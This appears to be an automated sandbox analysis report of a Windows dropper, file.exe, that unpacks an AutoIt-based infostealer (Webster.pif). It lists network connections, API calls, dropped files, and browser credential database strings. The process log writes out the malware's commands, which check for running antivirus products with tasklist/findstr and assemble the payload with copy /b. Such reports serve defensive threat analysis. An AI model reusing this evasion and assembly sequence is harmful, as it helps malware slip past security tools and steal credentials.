                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64187
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64186
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64183 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64167 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64187 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64178
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64170 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64177
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64179
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64176 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64168 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64182 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64186 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64190
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64189 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64189
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64171 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64188
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64179 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64175 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64169 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64181 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64185 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64172 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64178 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64170
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64172
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64171
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64174 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64174
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64180 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64173
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64176
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64175
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64184 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64188 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64190 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64167
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64169
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64168
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64173 -> 443
                        Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.6:64167 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:64168 version: TLS 1.2
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AF4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00AF4830
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AF4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00AF4632
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00B0D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00B0D164
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE42D5: CreateFileW,DeviceIoControl,CloseHandle,11_2_00AE42D5
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AD8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00AD8F2E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00AE5778
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\AssuranceRequirementsJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\MetBlakeJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\HeatedTimothyJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\AdsAspJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\ChuckVoltageJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\BlondKatrinaJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\SingleOxfordJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\FindingsForJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\BenefitBackupJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\MeshUpdatingJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\ErikOccasionallyJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\NhlPhrasesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\SeasShadowJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\AtlasAdvantagesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\SponsorDpiJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\BrickFinJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\NtOperationsJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\DefinedDrillJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\PlayersSiteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\AirfareGamblingJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\OverheadSolutionsJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\FieldAnalysesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\NetExcitingJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\SeattleNukeJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\WindowsAlbertaJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\WinningNativeJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040497C0_2_0040497C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406ED20_2_00406ED2
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004074BB0_2_004074BB
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A8B02011_2_00A8B020
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A894E011_2_00A894E0
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A89C8011_2_00A89C80
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA23F511_2_00AA23F5
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00B0840011_2_00B08400
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB650211_2_00AB6502
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A8E6F011_2_00A8E6F0
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB265E11_2_00AB265E
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA282A11_2_00AA282A
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB89BF11_2_00AB89BF
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00B00A3A11_2_00B00A3A
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB6A7411_2_00AB6A74
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A90BE011_2_00A90BE0
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00ADEDB211_2_00ADEDB2
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AACD5111_2_00AACD51
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00B00EB711_2_00B00EB7
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE8E4411_2_00AE8E44
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB6FE611_2_00AB6FE6
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA33B711_2_00AA33B7
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AAF40911_2_00AAF409
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A9D45D11_2_00A9D45D
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A8F6A011_2_00A8F6A0
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA16B411_2_00AA16B4
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A9F62811_2_00A9F628
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A8166311_2_00A81663
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA78C311_2_00AA78C3
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA1BA811_2_00AA1BA8
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AADBA511_2_00AADBA5
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB9CE511_2_00AB9CE5
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A9DD2811_2_00A9DD28
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA1FC011_2_00AA1FC0
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AABFD611_2_00AABFD6
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: String function: 00A91A36 appears 34 times
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: String function: 00AA0D17 appears 70 times
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: String function: 00AA8B30 appears 42 times
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 004062A3 appears 58 times
                        Source: file.exeStatic PE information: invalid certificate
                        Source: file.exe, 00000000.00000003.2086397836.00000000026CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: file.exeStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/49@4/2
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEA6AD GetLastError,FormatMessageW,11_2_00AEA6AD
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AD8DE9 AdjustTokenPrivileges,CloseHandle,11_2_00AD8DE9
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AD9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00AD9399
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_00AE4148
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_00AE443D
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199747278259[1].htmJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsg5A30.tmpJump to behavior
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: AAFIDG.11.dr, HDAFII.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: file.exeReversingLabs: Detection: 29%
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 229536
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ReprintVerificationMercyRepository" Elliott
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Exhibit + Rand + Hours 229536\U
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\229536\Webster.pif 229536\Webster.pif 229536\U
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 229536Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ReprintVerificationMercyRepository" Elliott Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Exhibit + Rand + Hours 229536\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\229536\Webster.pif 229536\Webster.pif 229536\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
